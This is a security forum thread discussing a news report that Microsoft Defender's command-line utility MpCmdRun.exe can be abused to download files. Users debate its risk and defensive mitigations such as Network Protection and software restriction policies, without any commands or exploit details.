Microsoft Defender can ironically be used to download malware

Status
Not open for further replies.
danb

danb

From VoodooShield
Thread author
Verified
Top Poster
Developer
Well-known
Forum Veteran
May 31, 2017
2,157
12,540
3,078
Overland Park, KS
Content source
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/
  • Like
  • Wow
  • +Reputation
Reactions: Protomartyr, bayasdev, JohnB and 25 others
It is a fairly logical move. Microsoft introduced so many LOLBins in the past, why it should stop. But truly, this is the most stupid one. 🙃
Of course, this LOLBin is equally dangerous for any AV (for now).

Edit.
No problem for H_C, VS, and SWH due to anti-script (command-line) protection.
 
Last edited:
  • Like
  • +Reputation
Reactions: Protomartyr, ZeroDay, Cortex and 16 others
Like any other LOLBin which tries to download something, this one can be mitigated in WD by activating WD Network Protection. This will activate SmartScreen URL check.
 
  • Like
  • +Reputation
Reactions: Protomartyr, ZeroDay, Cortex and 9 others
Andy Ful said:
this one can be mitigated in WD by activating WD Network Protection
Click to expand...

Probably speculation: Is this why there were these multiple updates to the Antimalware Platform recently? I'm flashing on the recent conflict between Network Inspection Service and Memory Integrity. There had to have been some exceedingly good reasons.

Even though the update to version 4.18.4008.4 "fixed" this, maybe in light of this information, it's better to continue on to update to the very latest Client version: 4.18.2008.9.
 
  • Like
Reactions: Protomartyr, SeriousHoax, DDE_Server and 5 others
plat1098 said:
...
Even though the update to version 4.18.4008.4 "fixed" this, maybe in light of this information, it's better to continue on to update to the very latest Client version: 4.18.2008.9.
Click to expand...
" In tests conducted by BleepingComputer.com, this feature was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9. "
 
  • Like
  • +Reputation
  • Thanks
Reactions: Protomartyr, ZeroDay, Cortex and 8 others
  • Like
Reactions: Protomartyr, Cortex, oldschool and 1 other person
plat1098 said:
Probably speculation: Is this why there were these multiple updates to the Antimalware Platform recently? I'm flashing on the recent conflict between Network Inspection Service and Memory Integrity. There had to have been some exceedingly good reasons.

Even though the update to version 4.18.4008.4 "fixed" this, maybe in light of this information, it's better to continue on to update to the very latest Client version: 4.18.2008.9.
Click to expand...
Hmmmm... interesting observation, I think you are on to something ;).

I will say, MS has come a VERY long way with WD and it truly is amazing now. It does need A LOT of work on usability. I mean, just to create an exception for one folder or to restore files from quarantine takes like 50 clicks and 20 minutes ;).

I can FINALLY say this... really all you need is WD and VS and you are good to go. I kinda saw this coming a couple of years ago... I just had no idea that they would work together THIS well. In all fairness, I should not be surprised... it was all by design ;).
 
  • Like
  • Thanks
Reactions: Protomartyr, ZeroDay, Cortex and 3 others
Andy Ful said:
It is a fairly logical move. Microsoft introduced so many LOLBins in the past, why it should stop. But truly, this is the most stupid one. 🙃
Of course, this LOLBin is equally dangerous for any AV (for now).

Edit.
No problem for H_C, VS, and SWH due to anti-script (command-line) protection.
Click to expand...
And your new creation will block system calls as well, right? ;).
 
  • Like
Reactions: Cortex
WhiteMouse said:
I just blocked MpCmdRun.exe, thanks Dan. /s

I believe this could happen to any antivirus vendors if they had more marketshare.
Click to expand...
Sure, thank you as well! Yeah, I believe this too... it is all about marketshare.

That is why having another layer of unknown protection (to the attacker) makes a lot of sense.
 
  • Like
Reactions: Protomartyr and Cortex
Thank you for this post i will be visiting family members homes to install another solution till this is fixed.
 
  • Like
Reactions: Cortex
The good news is that Microsoft Defender will detect malicious files downloaded with MpCmdRun.exe, but it is unknown if other AV software will allow this program to bypass their detections.
Click to expand...

Sure so in other words let spread the information to cyber criminals so they can exploit other software L0L. they dont call it "bleeping computer" for nothing.
 
danb said:
And your new creation will block system calls as well, right? ;).
Click to expand...
Heaven forbid!
I do not create software to kill the system.

Edit.
In fact, thanks to SRP the MpCmdRun.exe can be blocked for malware (in the home environment) and still allowed for a few WD scheduled system tasks.
 
Last edited:
  • Like
  • HaHa
Reactions: Protomartyr, Cortex, oldschool and 3 others
Bryan320 said:
Thank you for this post i will be visiting family members homes to install another solution till this is fixed.
Click to expand...
You will waste your time and bloat the system by installing & reinstalling security solutions.
  1. There are already several LOLBins in the system that can do the same and are used by malc0ders for a long time. So this new one does not increase the danger for the home users. It can be less visible in incidents available in enterprise solutions.
  2. This LOLBin will work with any AV as well (similarly to most LOLBins) - it does not require WD enabled.
  3. WD will be probably the first to secure this by Machine Learning (locally or in the cloud). It is easy because it is known what kind of file should be downloaded (WD update).
You should rather think about how to prevent/mitigate other popular LOLBins.
 
Last edited:
  • Like
  • +Reputation
Reactions: Protomartyr, ZeroDay, blackice and 10 others
Status
Not open for further replies.

You may also like...